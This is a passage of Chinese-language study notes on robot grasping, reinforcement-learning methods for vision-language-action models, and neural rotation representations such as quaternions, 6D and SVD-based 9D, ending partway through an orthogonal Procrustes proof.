但是,在实践过程中,发现简单地使用这个方法还是会存在较大的 Sim2Real Gap,这是由于合成背景和前景照片的时候,分界太过明显,从而导致分割的 Mask R-CNN 学习到的经验难以应用到真实世界。

为了解决这个问题,王老师又提出了使用 Co-Training 的方案,即同时结合过往 Image Segmentation 领域收集的真实数据集(Coco)与我们的合成数据集来一同对 Mask R-CNN 进行 混合训练,但前者不参与后续的 NOCS 映射训练,只为分割提供监督信号。

王老师认为,这种合成数据的使用在具身智能领域是必不可少的,因为训练学习所需的真实数据很难大规模、轻易地获取到。

王老师还提到,目前 Pose Estimation 领域最 work 的模型(FoundationPose)就是纯合成数据训练出来的,不过他们的合成过程会更加精细

sota_pose_estimator

对于预测得到的位姿,有时候还需要 Refinement,比如之前介绍的 ICP 算法。

然而,ICP 算法同时需要点云与物体表面 mesh,真实情况下可能两者都没有,所以现在这个问题完全用神经网络来做,而其训练的数据全靠合成。

运动规划的层级

$$ \text{pose} \to \text{grasp} \to \text{motion planning} \to \text{control} $$

  1. 一代技术:工业机器人,完全的轨迹重放,无环境感知能力
  2. 二代技术:位姿预测,但需要物体预先定义,轨迹通过位姿进行预测规划得到
  3. 三代技术:抓取预测
  4. 四代技术:动作规划预测,神经网络端到端直接输出动作轨迹 Action / Trajectory,可以进行闭环纠错
  5. 五代技术:完全的闭环控制,大语言模型指导进行语义推理

开环控制如果 pose estimation 足够快,也能搞成闭环。

抓取(Grasp)

抓取:指通过在接触点施加力和力矩,以期望的方式约束物体运动的过程。

Force Closure

定义:通过摩擦力 维持平衡的约束状态,如果施加在摩擦接触点上的一组力足以补偿施加在物体上的任何外部力,则称为力闭合。

王鹤老师原话:以某一组力在某一组接触点(Contact Point)抓取起来后,物体需要任意方向的加速度,都可以提供。

Force Closure 是判断抓取质量的一个重要指标。

Form Closure

定义:仅仅通过 几何约束 完全限制刚体运动的状态( 不依赖摩擦力 )。

根据定义,不难推知,严苛程度上:抓起来 ≤ force closure ≤ form closure

在规划机器人手的抓取时,力闭合是一个很好的最低要求。形闭合通常过于严格,需要太多接触点。

回归与生成

传统的抓取问题可以看作是一个回归问题,即预测唯一的抓取位姿。然而,由于遮挡和对称性,一个物体通常存在多个可行的抓取(多峰分布)。因此,将抓取建模为一个生成问题更为合适。

💾

RL in VLA

2025年3月22日 08:34

iRe-VLA

Paper

ire_vla

Insight

  1. RL 只用以更新少部分参数,即 Action 头,从而避免 RL 大规模更新参数的不稳定。
  2. SFT 来更新 LLM,更加稳定
  3. 训练过程:先 SFT,然后迭代进行 RL(PPO,on-policy)和 SFT

Intresting

  1. LLM 用以高层规划(分解任务,无法直接应用于物理世界)或者低层控制信号(LLM 中引入 Action Token 或者后接动作头)
  2. RL 直接用以提升 VLA 输出的低层控制信号
  3. RL 得到的新成功轨迹加入数据集,on-policy
  4. RL 用以探索,SFT 用以记忆

Arch

Backbone:BLIP

Componentes:LoRA,TokenLearner(压缩多 token 到单 token)

Reward Signal:MSE (SFT), 01 Sparse (RL)

Result

当在线数据 $|D_{\text{RL}}| > 0.3|D_e|$ 时,超越纯模仿学习的涌现能力(应对遮挡、动态干扰)。

RLPD

Paper

Efficient Online Reinforcement Learning with Offline Data

rlpd

Insight

  1. 对称采样:50% 在线数据 + 50% 离线数据,去除对于离线数据质量的假设
  2. LayerNorm 约束价值函数 $Q$,抑制 OOD 时的过度自信(价值外推),稳定值函数
  3. 高效采样:增加数据回放比 UTD,采用随机集成蒸馏(见下述算法)

Algorithm

$$ \begin{array}{l} \hline \textbf{算法} \ \text{在线强化学习结合离线数据 RLPD} \ \hline \text{初始化:} \ \quad \text{层归一化,集成规模 } E,\ \text{梯度步数 } G,\ \text{网络架构} \ \quad \text{评论家参数 } \theta_1,...,\theta_E\ (\theta'i \leftarrow \theta_i),\ \text{策略参数 } \phi \ \quad \text{折扣因子 } \gamma,\ \text{温度系数 } \alpha,\ \text{EMA 权重 } \rho,\ \text{目标子集 } Z \in {1,2} \ \quad \text{经验池 } \mathcal{R} = \varnothing,\ \text{离线数据集 } \mathcal{D} \ \hline \text{主循环:} \ \quad \text{获取初始状态 } s_0 \ \quad \text{循环 } t=0 \text{ 至 } T: \ \qquad \text{执行动作 } a_t \sim \pi\phi(\cdot|s_t),\ \text{存储转移 } (s_t, a_t, r_t, s_{t+1}) \text{ 至 } \mathcal{R} \ \hline \qquad \text{训练步骤 (重复 } G \text{ 次):} \ \qquad\quad \text{采样 } b_R \leftarrow \frac{N}{2} \text{ 自 } \mathcal{R},\ b_D \leftarrow \frac{N}{2} \text{ 自 } \mathcal{D} \ \qquad\quad \text{合并批次 } b = b_R \cup b_D \ \qquad\quad \text{计算目标值:} \ \qquad\qquad \mathcal{Z} \leftarrow \text{随机选取 } Z \text{ 个索引(从 } {1,...,E} \text{)} \ \qquad\qquad y = r + \gamma \big[\min_{i\in\mathcal{Z}} Q_{\theta'i}(s', \tilde{a}')\big] + \gamma\alpha \log \pi\phi(\tilde{a}'|s') \ \qquad\qquad \text{其中 } \tilde{a}' \sim \pi_\phi(\cdot|s') \ \hline \qquad\quad \text{评论家更新:} \ \qquad\qquad \text{循环 } i=1 \text{ 至 } E: \ \qquad\qquad\quad \theta_i \leftarrow \arg\min \frac{1}{N}\sum (y - Q_{\theta_i}(s,a))^2 \ \qquad\qquad \theta'i \leftarrow \rho\theta'i + (1-\rho)\theta_i \ \hline \qquad\quad \text{策略更新:} \ \qquad\qquad \phi \leftarrow \arg\max \frac{1}{E}\sum{i=1}^E Q{\theta_i}(s,\tilde{a}) - \alpha \log \pi_\phi(\tilde{a}|s) \ \qquad\qquad \text{其中 } \tilde{a} \sim \pi_\phi(\cdot|s) \ \hline \end{array} $$

Result

收敛变快(300k vs 1M),效果提升。

HIL-SERL

Paper / Homepage / Code

Human in Loop SERL,双臂任务

hil_serl

Insight

主动学习、人在回路:系统向模型请求可能的修正,offline 更新

Arch

Backbone:ResNet-10

Reward:01 Sparse (MLP)

AC 架构:

  • Actor:采样,送到 replay buffer,可以人为干预
  • Learner:学习,RLPD 均等采样

两个缓冲区:

  • 人类示范(离线)
  • 策略实施(RL buffer)

对于人类产生的干预数据:

  • actions 同时放到两个缓冲区(RL buffer + Demo buffer)
  • P 概率转移只放到 RL buffer

单独用 DQN 学习抓握(夹爪建模为离散动作),输出动作基于 EEF 当前坐标系,抗干扰。

RLDG

Paper

Reinforcement Learning Distilled Generalist

rldg

Insight

  1. 使用 RL 生成高质量微调数据,微调 HIL-SERL
  2. 数据质量 > 数据数量

ConRFT

Paper

Consistency-based Reinforced Fine-Tuning

conrft

Math

离线 Critic 损失

$$ \mathcal{L}{Q}^{offline}(\theta) = \alpha\left(\mathbb{E}{s\sim\mathcal{D},a\sim\pi}[\max(Q_{\theta},V^{\mu})] - \mathbb{E}{s,a\sim\mathcal{D}}[Q{\theta}]\right) + \frac{1}{2}\mathbb{E}[(Q_{\theta}-\mathcal{B}^{\pi}\overline{Q})^2] $$

  • $\max(Q_{\theta},V^{\mu})$:防止 OOD(分布外)动作的高估
  • $\mathbb{E}[(Q_{\theta}-\mathcal{B}^{\pi}\overline{Q})^2]$:稳定 Q 值估计,防止离线数据不足导致的过拟合

一致性策略

$$ \pi_{\psi}(a|s) = f_{\psi}(a^k, k | E_{\phi}(s)) $$

  • $f_{\psi}$ 一致性策略是一个基于扩散模型的策略,负责去噪并生成最终动作。其目标是学习从单位高斯分布 $\mathcal{N}(0,I)$ 的随机噪声动作 $a^k$ 到专家动作分布 $a \sim \pi^*(a|s)$ 的映射。映射过程以当前状态编码 $E_{\phi}(s)$ 为条件。
  • $a^k \sim \mathcal{N}(0, kI)$ 是第 $k$ 步的含噪声动作将扩散时间步 $[\epsilon, K]$ 划分为 $M$ 个子区间(边界为 $k_1=\epsilon \le \dots \le k_M=K$),每个子区间对应一个噪声尺度 $k_m$。例如,$\epsilon=0.002$ 表示初始噪声尺度极小,$K$ 为最大噪声尺度。

$$ \mathcal{L}{\pi}^{offline}(\psi) = -\eta\mathbb{E}[Q(s,a)] + \beta\mathbb{E}[d(f{\psi}(a+k_mz),a)] $$

  • $-\eta\mathbb{E}[Q(s,a)]$:引导策略朝高回报方向优化

  • $\beta\mathbb{E}[d(f_{\psi}(a+k_mz),a)]$:迫使策略在不同噪声尺度下保持动作预测的一致性,也即约束动作与演示数据的一致,解决人类演示的次优问题

    对任意中间扩散步 $k_m$,若向专家动作 $a$ 添加噪声 $k_m z$ 得到扰动动作 $a + k_m z$,一致性策略 $f_{\psi}$ 应能将其映射回原始专家动作 $a$。

Insight

  • 人在回路
  • 一致性策略保证鲁棒性,但在线学习阶段逐步降低 $\beta$(BC 权重),实现从模仿到自主探索的平滑过渡
  • 反馈信号中存在时间惩罚,引导快速完成任务

GRAPE

Paper

Generalizing Robot Policy via Preference Alignment

grape

Math

TPO 轨迹偏好优化损失(Trajectory-wise Preference Optimization Loss,类似 DPO): $$ \mathcal{L}{\text{TPO}} = -\mathbb{E} \left[ \log \sigma \left( \beta \left( \log \frac{\pi\theta(\zeta_w)}{\pi_{\text{ref}}(\zeta_w)} - \log \frac{\pi_\theta(\zeta_l)}{\pi_{\text{ref}}(\zeta_l)} \right) \right) \right] $$

  • $\beta$:温度系数,调节策略更新的强度(类比 “学习率”),越大这个 Loss 也越大,策略对比越强,更关注优选 / 劣选轨迹的差异;越小越保守更新,这项损失不重要。
  • $\pi_\theta$:待优化的策略(参数为 $\theta$)
  • $\pi_{\text{ref}}$:参考策略(预训练的初始策略)
  • $\zeta_w, \zeta_l$:优选轨迹(winning)和劣选轨迹(losing)

Insight

  • 对比学习,增大优选轨迹概率比,降低劣选轨迹概率比

  • 存在外部 Critic,由强大 LLM(GPT4o)给出,而非手动设计,某一时刻的成本为后续成本的乘积: $$ R_{\text{ext}}(\zeta) = \prod_{i=1}^{\mathbf{S}} e^{-C^{S_i}({\kappa_{S_i}})} $$ 其中:

    • $\mathbf{S}$:子系统的总数
    • ${\kappa_{S_i}}$:子任务 $S_i$ 的动态参数集合,如关节角度、速度、接触力等实时状态
    • $C^{S_i}$:子任务 $S_i$ 的成本函数,由 LLM 给出
  • 完整的 Reward 同时包括外部 Critic、模型自身、以及成功与否信息加权,用以判断 $\zeta_w, \zeta_l$: $$ R_{\text{GCPG}}(\zeta) = \lambda_1 R_\text{self}(\zeta) + \lambda_2 R_\text{ext}(\zeta) + \lambda_3 I_{\text{success}}(\zeta) $$ 其中: $$ R_\text{self}(\zeta) =\log(\pi(\zeta, q)) = \log(\prod_{i=1}^T\pi(a_i \mid(o_i, q))) $$

Algorithm

$$ \begin{array}{l} \hline \textbf{算法} \ \text{迭代偏好优化算法} \ \hline \text{初始化:} \ \quad \text{基础 VLA 策略 } \pi_\theta,\ \text{任务指令集 } Q = {q_i},\ \text{阶段分解器 } \mathcal{M}D \ \quad \text{最大迭代次数 } K,\ \text{奖励权重 } {\lambda_1, \lambda_2, \lambda_3} \ \quad \text{阶段关键点 } {\kappa{S_i}},\ \text{成本函数 } {C^{S_i}j}\ \text{及阈值 } {\tau^{S_i}j} \ \hline \text{主循环:} \ \quad \text{循环 } k=1 \text{ 至 } K: \ \qquad \text{用 } \pi\theta \text{ 和 } Q \text{ 采样轨迹集 } \mathcal{D}^k = {\zeta_i}{i=1}^M \ \qquad \text{循环轨迹 } \zeta \in \mathcal{D}^k: \ \qquad\quad \text{分解 } \zeta \text{ 为多阶段 } S\ \text{(阶段分解)} \ \qquad\quad \text{计算各阶段成本 } C_{S_i}\ \text{(阶段成本)} \ \qquad\quad \text{计算外部奖励 } R_{\text{ext}}(\zeta)\ \text{(全局成本)} \ \qquad\quad \text{计算策略自奖励 } R_{\text{self}}(\zeta)\ \text{(轨迹自评估)} \ \qquad\quad \text{验证任务成功指标 } I_{\text{success}}(\zeta)\ \text{(成功判别)} \ \qquad\quad \text{聚合 GCPG 奖励 } R_{\text{GCPG}}(\zeta)\ \text{(综合奖励)} \ \hline \qquad \text{按 } R_{\text{GCPG}}(\zeta) \text{ 排序 } \mathcal{D}^k \ \qquad \text{从 top-}m \text{ 和 bottom-}m \text{轨迹生成配对 } {\zeta_w, \zeta_l} \ \qquad \text{用 TPO 损失更新 } \pi_\theta\ \text{(偏好对齐)} \ \hline \text{返回:优化策略 } \pi^* \ \hline \end{array} $$

ASAP

Paper

Aligning Simulation and Real-World Physics

asap

Insight

  1. 预训练得到基础策略(模拟环境中)

  2. 后训练收集现实数据,模拟重放,获取跟踪误差,训练 delta 模型来补偿差异,形成残差校正项,通过动作空间修正隐式补偿,而不是像 SysID 一样显式建模物理参数来修正差异

    骑自行车时,人脑自动补偿重心偏移,而非计算力学方程

    $$ s_{t+1} = f^{\text{ASAP}}(s_t, a_t) = f^\text{sim}(s_t, a_t + \pi^\Delta(s_t, a_t)) $$

  3. 非对称 AC 架构

    1. Actor 网络仅依赖本体感知输入(关节位置 / 速度、基座姿态、时间相位)
    2. Critic 网络额外访问特权信息(参考动作轨迹、全局位置)

Arch

  1. PPO,AC
  2. Reward:$r_t = r_{\text{task}} + r_{\text{penalty}} + r_{\text{regularization}}$
    • 任务奖励(身体位置 / 旋转 / 速度匹配)
    • 惩罚项(关节极限、扭矩超限)
    • 正则化(动作平滑性)

💾

视觉与抓取 I

2025年3月17日 09:12

抓取

抓取(grasping):通过末端执行器(end-effector)对物体施加约束(力和扭矩),以期望的方式限制物体运动的过程。

抓取合成(grasping synthesis):对于夹爪位姿或者关节控制的高维搜索 / 优化问题。

vision_grasping_robot_sequence

  • 抓握式操作 (Prehensile Manipulation):通过完全约束物体自由度实现精确控制
  • 非抓握式操作 (Non-prehensile Manipulation):利用推、滑等接触力学原理调整物体状态,适用于薄片状物体或预处理场景,不是所有动作都需要抓取

抓取的自由度

抓取姿势(Grasp Pose):手的位置、方向和关节状态

  • 4-DoF 抓取:仅需平移和绕重力轴旋转,适用于结构化环境、固定位置(如流水线物料分拣)

    $$ (x, y, z, \theta_z) $$

    rpy

    yaw

  • 6-DoF 抓取:允许任意方向接近,处理非结构化场景(即更复杂的任务如杂乱堆叠物体) $$ (x, y, z, \theta_x, \theta_y, \theta_z) $$

  • 手指自由度

    • 平行夹爪:开 / 关,1 DoF
    • 灵巧手(Dexterous Hand):21 DoF

开环抓取与闭环抓取

开环控制是指 不使用反馈机制 的控制系统。

  1. 控制命令直接发送给系统,不基于系统当前状态或结果进行调整
  2. 输入与输出之间没有信息回路
  3. 系统不会根据执行结果来自动修正控制信号

开环抓取:基于视觉位姿估计,预测抓取位姿,执行抓取,视觉只会用到一次,如果失败(如掉落、没抓起来),不会尝试修正,“蒙着眼睛做事情”。

闭环抓取:基于视觉位姿估计,预测抓取位姿,执行抓取,如果抓取失败,则调整抓取位姿,重新抓取。

开环抓取系统

一般处理流程:

  1. 视觉感知
  2. 位姿估计
  3. 运动规划
  4. 控制执行

对已知物体的抓取

由于物体信息已知,可以通过对物体的位姿进行预测。也就是在物体自身坐标系下进行抓取标注,然后转换到世界坐标系下。

  1. RGB 图像,若满足

    1. 相机内参(将三维空间点投影到二维图像平面的关键参数,包括焦距、主点灯)已知:逆向的关键

    2. 物体大小已知:避免歧义(ambiguity)

      why_pigeon_so_big

      道理我都懂,但是这个鸽子怎么这么大?

    3. 物体无对称性

    那么其可以唯一对应一个位姿

  2. 点云(Point Cloud)图像,只需满足物体 无对称性,那么就可以唯一对应一个位姿。

Iterative Closest Point (ICP) 算法

流程:

  1. 初始化变换估计 $T_0 = (R_0, t_0)$

  2. 迭代直至收敛:

    1. 数据关联:确立变换后最近邻点对,建立模板点云 $M$ 与场景点云 $S$ 对应关系

      $$ C = { (m_i, s_j) | s_j = \arg \min_{s \in S} | T_k m_i - s | } $$

    2. 变换求解:最小化对应点距离 $$ T_{k+1} = \arg \min_T \sum_{(m,s) \in C} | Tm - s |^2 $$

问题:比较怕物体被挡住造成 点云缺失

对未知物体的抓取

直接预测抓取位姿。

也有算法可以从见过同一类别物体进行泛化。

旋转回归(Rotation Regression)

回归:估计连续变量。

旋转回归:一种特殊的回归任务,对于输入信号,经由神经网络估计连续的旋转变量。

Typora 2025-03-18 16.13.52

其中,表示方式空间 $R$ 可以是四元数、欧拉角等,而 $X$ 是 $\mathbb{SO}(3)$ 群。

回顾一下 $\mathbb{SO}(3)$ 群的定义,$\mathbb{SO}(3)$ 是特殊正交群(Special Orthogonal group),由所有三维旋转矩阵组成。

3D 旋转矩阵 $R$ 是一个 $3\times3$ 矩阵,满足以下条件:

  • $R^{\top}R = I$ (正交性)
  • $\det R = +1$ (保持右手坐标系)

$\mathbb{SO}(2) / \mathbb{SO}(3)$ 具有很好的连续性,没有跳变点的存在。

与普通回归不同,旋转表示在非线性空间、非欧空间中,所以对于之前所讲过的所有旋转的表达方式,简单地使用 MSE 来作为监督信号都会不够理想。

这是因为,CNN 理应具有连续性,对于输入的微小变动,其输出不应当造成很大的改变。

而如果对于某一旋转表达方式,存在这种 Ground Truth 监督信号的跳变,神经网络为了拟合这种跳变点,就会导致其权重矩阵 $W$ 出现一些很大的参数,造成数值不稳定性的同时,为之消耗大量的注意力,大部分的训练过程都去拟合这种跳变而不是其他占比更多、更泛用的部分,这是非常不好的。并且这一过程是 Loss 无关的,是由于选择了不好的表达方式造成的本质性问题。

所以,理想的表达方式,应当满足:

  1. 双射,表达方式到 $\mathbb{SO}(3)$ 群是一一映射的,否则特定旋转时可能出现多种等价表示,这使得神经网络难以学习
  2. 连续, $\mathbb{SO}(3)$ 群中任何一点附近的连续变化,其对应的表达方式应当也是连续变化,也即不存在性质不好的 奇点(Singularities)

欧拉角

欧拉角使用三个角度(通常表示为 $\alpha$、$\beta$、$\gamma$)来描述绕三个主轴的连续旋转,完整的旋转矩阵可以通过组合这些基本旋转得到:

$$ R = R_x(\alpha)R_y(\beta)R_z(\gamma) $$

问题:欧拉角的表达方式天然存在非双射、万象节锁的问题

举例:考虑 2D 的情况,此时使用单一自由度 $\theta$ 来代表绕轴旋转的角度。

euler_angle_rotation_discontinuity

绕旋转轴转 $0$ 和 $2\pi$ 是一样的,但是在实际的 $\mathbb{SO}(2)$ 中是连续的。

一个解决方法是 引入冗余维度,把低维空间中的的不连续改成高维空间中的连续,如 $\theta \to (x,y)$,后者是连续的,且能反向求解出前者。

轴角

轴角表示由一个单位向量 $\mathbf{e} = [e_x, e_y, e_z]^{\top}$(表示旋转轴)和一个标量 $\theta$(表示旋转角度)组成:

$$ (\text{axis}, \text{angle}) = (\mathbf{e}, \theta) $$

可以使用罗德里格旋转公式(Rodrigues' rotation formula)将轴角表示转换为旋转矩阵:

$$ R = I + (\sin\theta)K + (1-\cos\theta)K^2 $$

其中 $K = [\mathbf{e}]_\times$ 是其叉乘矩阵:

$$ K = \begin{bmatrix} 0 & -e_z & e_y \ e_z & 0 & -e_x \ -e_y & e_x & 0 \end{bmatrix} $$

问题: 当 $\theta = 0$ 时,任何轴都表示单位旋转(即不旋转);当 $\theta = \pi$ 时,绕某个轴的旋转 $(\mathbf{e}, \pi)$ 和绕它的反方向 $(-\mathbf{e}, \pi)$ 表示相同的旋转。

四元数

四元数是复数的一种推广,形式为:

$$ q = w + xi + yj + zk $$

其中 $w$ 是实部,向量 $\mathbf{v} = (x, y, z)$ 是虚部,且 $i^2 = j^2 = k^2 = ijk = -1$。

任何一个旋转,即绕某个单位向量 $\hat{\omega}$ 旋转 $\theta$ 角度,对应的四元数可以表示为:

$$ q = \left[\cos\frac{\theta}{2}, \sin\frac{\theta}{2} \hat{\omega}\right] $$

问题:四元数存在 “双重覆盖” 关系。

我们可以很容易地发现:

$$ \begin{aligned} q &= \left[\cos\frac{\theta}{2}, \sin\frac{\theta}{2} \hat{\omega}\right] \ -q &= \left[-\cos\frac{\theta}{2}, -\sin\frac{\theta}{2}\hat{\omega}\right] \ &= \left[\cos(\pi - \frac{\theta}{2}), \sin(\pi - \frac{\theta}{2}) (-\hat{\omega})\right] \end{aligned} $$

是等价的($-q$ 意味着同一旋转轴但是翻转正方向,然后旋转 $2\pi - \theta$)。

double_coverage

为此,我们通常约束四元数位于上半球(即 $w \geq 0$),但这又会引入新的不连续性:

  1. 临近球大圆的不连续性

    quaternion_double_coverage_fix_issue

  2. 球大圆上的不连续性:由于双重覆盖,我们只能取一个半圆,但是在这个切面圆的直径上,我们还是只能选取两个切点中的一个(否则又存在双重覆盖问题,$q = -q$),而这么选取的话,在这个点附近,依旧有类似欧拉角的跳变存在(还是那个原因,在这个点附近的微小变动会引发跳变)

    quaternion_issue

6D 表示

为了解决不连续性问题,我们放弃了选择上述方法,改为回到旋转矩阵本身。

直接尝试拟合旋转矩阵,会引入 9 个数的自由度,我们还需要映射到 $\mathbb{SO}(3)$,所以引入进行施密特正交化以满足旋转矩阵条件:

  1. 第一列标准化
  2. 第二列只保留垂直于第一列的分量,然后标准化
  3. 第三列通过第一列和第二列的叉乘确定

形式化表示为:

$$ f_{GS}\left(\begin{bmatrix} \mathbf{a}_1 & \mathbf{a}_2 \end{bmatrix}\right) = \begin{bmatrix} \mathbf{b}_1 & \mathbf{b}_2 & \mathbf{b}_3 \end{bmatrix} $$

其中:

$$ \mathbf{b}_i = \begin{cases} N(\mathbf{a}_1) & \text{if } i = 1 \ N(\mathbf{a}_2 - (\mathbf{b}_1 \cdot \mathbf{a}_2)\mathbf{b}_1) & \text{if } i = 2 \ \mathbf{b}_1 \times \mathbf{b}_2 & \text{if } i = 3 \end{cases} $$

其中 $N(\mathbf{v})$ 表示向量 $\mathbf{v}$ 的归一化。

这种表示实际上只有 6 个自由度,所以我们叫它 6D 表示方法。

然而,这个方法固然简单,但是他引入了新的问题:拟合得到的 9 个数彼此并不等价。

  1. 对于第一列,是一等公民,直接归一化
  2. 对于第二列,是二等公民,需要移除平行于第一列的分量
  3. 对于第三列,甚至完全不考虑它的数值,正交系的三个向量直接由前两个叉乘得到

所以,这种表示方式与传统的 L2 Norm 的损失函数并不协调。

当然我们可以相对应地分优先级,第一列直接算,第二列需要加权,第三列直接排除在损失函数之外,但直觉上就会感觉到不平衡的存在 —— 神经网络输出的各个神经元本应等价,但是你算 Loss 的时候还要排除,哪有这样的道理?

9D 表示

9D 表示直接使用完整的旋转矩阵(9 个元素)作为表示。为将神经网络的欧几里得输出映射到 $\mathbb{SO}(3)$,同时满足前述要求:

  1. 双射
  2. 连续
  3. 等价

我们使用奇异值分解(SVD)对之进行正交化:

$$ \hat{R} = U\begin{bmatrix} 1 & 0 & 0 \ 0 & 1 & 0 \ 0 & 0 & \det(UV) \end{bmatrix}V^{\top} $$

其中 $U$ 和 $V$ 是对神经网络预测除的矩阵进行 SVD 分解得到的正交矩阵,$\det(UV)$ 项确保结果矩阵的行列式为 +1,满足旋转矩阵的性质。

SVD 的基本过程

给定任意矩阵 $M \in \mathbb{R}^{3 \times 3}$,其奇异值分解(SVD)为:

$$ M = U \Sigma V^{\top} $$

其中:

  • $U$ 和 $V$ 是正交矩阵($U U^{\top} = V V^{\top} = I$)
  • $\Sigma$ 是对角矩阵,对角线元素为奇异值 $\sigma_1 \geq \sigma_2 \geq \sigma_3 \geq 0$

对于我们预测的旋转矩阵而言,这里分解得到的奇异值会很接近 1,但不一定就是 1,所以直接换掉它来使之满足正交化条件。

优势:CNN Friendly

  • 不区分对待矩阵的每一行,实现完全连续、一一映射的表示
  • 与神经网络的欧几里得输出空间兼容

增量旋转预测

对于预测增量旋转(delta rotation),即 $\mathbb{SO}(3)$ 在单位矩阵 $I$ 附近的小范围旋转,前面几种表示方式实际上都可以,因为此时在这个邻域没有了我们考虑了半天的奇点(Singularities)问题。

而且,此时由于四元数等表示方式需要预测参数更少,学习起来甚至可能更快。

Rotation Fitting

使用神经网络先预测物体坐标或对应关系,然后解算旋转。具体步骤包括:

  1. 对物体表面的每个像素,预测其在物体建模模型上的 3D 坐标
  2. 基于这些对应关系拟合旋转矩阵

这种方法建立了模型坐标系(model) $(x_i^M, y_i^M, z_i^M)$ 和相机坐标系(camera) $(x_i^C, y_i^C, z_i^C)$ 两个坐标系之间的对应关系。

我们的目标是找到将模型坐标系转换到相机坐标系的最优变换矩阵(要求物体大小不变)。

model_to_camera_coordinates

这要求物体是见过的、标注过的,不然没法比对(缺乏 $(x_i^M, y_i^M, z_i^M)$ 模型坐标系基础定义)。

  • 有 Depth 信息:3d to 3d,$(u,v, d) \to (x_i^M, y_i^M, z_i^M)$
  • 没有 Depth 信息:2d to 3d,$(u,v) \to (x_i^M, y_i^M, z_i^M)$

正交 Procrustes 问题

给定两组对应的 3D 点集,不考虑位移 $t$ 的纯旋转拟合(求解它们之间的最优旋转矩阵)可以形式化为正交 Procrustes 问题,这是一个矩阵逼近问题。

定义:给定矩阵 $\mathbf{M} \in \mathbb{R}^{n \times p}$ 和 $\mathbf{N} \in \mathbb{R}^{n \times p}$,我们需要求解:

$$ \hat{\mathbf{A}} = \arg\min_{\mathbf{A} \in \mathbb{R}^{p \times p}} |\mathbf{M}^{\top} - \mathbf{AN}^{\top}|F^2 = \arg\min{\mathbf{A} \in \mathbb{R}^{p \times p}} |\mathbf{M} - \mathbf{NA}^{\top}|_F^2 \ \text{subject to} \quad \mathbf{A}^{\top}\mathbf{A} = \mathbf{I} $$

其中,$|\cdot|_F$ 表示 Frobenius 范数,定义为:

$$ |X|F = \sqrt{\text{trace}(X^{\top}X)} = \sqrt{\sum{i,j} x_{ij}^2} $$

这里:

  • $\mathbf{M}$ 可以表示目标坐标系中的点集(例如相机坐标系)

  • $\mathbf{N}$ 表示源坐标系中的对应点集(例如模型坐标系)

  • 求解的 $\mathbf{A}$ 即为从 $\mathbf{N}$ 到 $\mathbf{M}$ 的最优旋转矩阵

  • 约束条件 $\mathbf{A}^{\top}\mathbf{A} = \mathbf{I}$ 确保 $\mathbf{A}$ 是正交矩阵,保证了纯旋转变换(不包含缩放或剪切)。

正交 Procrustes 问题有一个优雅的解析解,可以通过奇异值分解(SVD)获得。如果我们对矩阵 $\mathbf{M}^{\top}\mathbf{N}$ 进行 SVD 分解:

$$ \mathbf{M}^{\top}\mathbf{N} = \mathbf{UDV}^{\top} $$

那么最优旋转矩阵为:

$$ \hat{\mathbf{A}} = \mathbf{UV}^{\top} $$

数学证明

首先回顾迹运算的性质:

  1. 线性性质:$\text{tr}(A + B) = \text{tr}(A) + \text{tr}(B)$
  2. 循环性质:$\text{tr}(ABC) = \text{tr}(BCA) = \text{tr}(CAB)$
  3. 转置性质:$\text{tr}(A^{\top}) = \text{tr}(A)$
  4. 标量提取:$\text{tr}(cA) = c·\text{tr}(A)$,其中 $c$ 为标量
  5. 与 Frobenius 范数的关系:$|A|_F^2 = \text{tr}(A^{\top}A) = \text{tr}(AA^{\top})$

利用迹运算的性质和 $\mathbf{A}$ 是正交矩阵的条件($\mathbf{A}^{\top}\mathbf{A} = \mathbf{I}$):

$$ \begin{aligned} |\mathbf{M} - \mathbf{NA}^{\top}|_F^2 &= \text{tr}((\mathbf{M} - \mathbf{NA}^{\top})^{\top}(\mathbf{M} - \mathbf{NA}^{\top}))\ &= \text{tr}(\mathbf{M}^{\top}\mathbf{M} - \mathbf{M}^{\top}\mathbf{NA}^{\top} - \mathbf{AN}^{\top}\mathbf{M} + \mathbf{AN}^{\top}\mathbf{NA}^{\top}) \ &= \text{tr}(\mathbf{M}^{\top}\mathbf{M}) - \text{tr}(\mathbf{M}^{\top}\mathbf{NA}^{\top}) - \text{tr}(\mathbf{AN}^{\top}\mathbf{M}) + \text{tr}(\mathbf{AN}^{\top}\mathbf{NA}^{\top}) \ &= \text{tr}(\mathbf{M}^{\top}\mathbf{M}) - \text{tr}(\mathbf{M}^{\top}\mathbf{NA}^{\top}) - \text{tr}((\mathbf{M}^{\top}\mathbf{NA}^{\top})^{\top}) + \text{tr}(\mathbf{N}^{\top}\mathbf{N}\mathbf{A}^{\top}\mathbf{A}) \ &= \text{tr}(\mathbf{M}^{\top}\mathbf{M}) - 2\text{tr}(\mathbf{M}^{\top}\mathbf{NA}^{\top}) + \text{tr}(\mathbf{N}^{\top}\mathbf{N}) \end{aligned} $$

注意到第一项 $\text{tr}(\mathbf{M}^{\top}\mathbf{M})$ 和第三项 $\text{tr}(\mathbf{N}^{\top}\mathbf{N})$ 都不依赖于 $\mathbf{A}$,因此最小化目标函数等价于最大化第二项 $\text{tr}(\mathbf{M}^{\top}\mathbf{NA}^{\top})$。

当我们有 SVD 分解 $\mathbf{M}^{\top}\mathbf{N} = \mathbf{UDV}^{\top}$ 时,可以将迹运算展开:

$$ \begin{aligned} \text{tr}(\mathbf{M}^{\top}\mathbf{NA}^{\top}) &= \text{tr}(\mathbf{UDV}^{\top}\mathbf{A}^{\top}) \ &= \text{tr}(\mathbf{UD}(\mathbf{AV})^{\top}) \ &= \text{tr}((\mathbf{AV})^{\top}\mathbf{UD}) \quad (\text{循环性质,左乘正交矩阵逆,右乘正交矩阵}) \ &= \sum_{i=1}^{d}[(\mathbf{AV})^{\top}\mathbf{U}]_{ii}d_i \end{aligned} $$

其中 $d_i$ 是矩阵 $\mathbf{D}$ 对角线上的第 $i$ 个元素,$d$ 是 $\mathbf{M}^{\top}\mathbf{N}$ 的非零奇异值的数量。

为了最大化上述和式,我们需要使 $(\mathbf{AV})^{\top}\mathbf{U}$ 的对角元素尽可能大。由于 $\mathbf{AV}$ 和 $\mathbf{U}$ 都是正交矩阵,因此 $(\mathbf{AV})^{\top}\mathbf{U}$ 也是正交矩阵,其对角元素的绝对值不能超过 1(否则对应的列 / 行的 $L_2$ 范数会超过 1)。

因此,该和式在所有 $(\mathbf{AV})^{\top}\mathbf{U}$ 的对角元素都等于 1 时达到最大值,即:

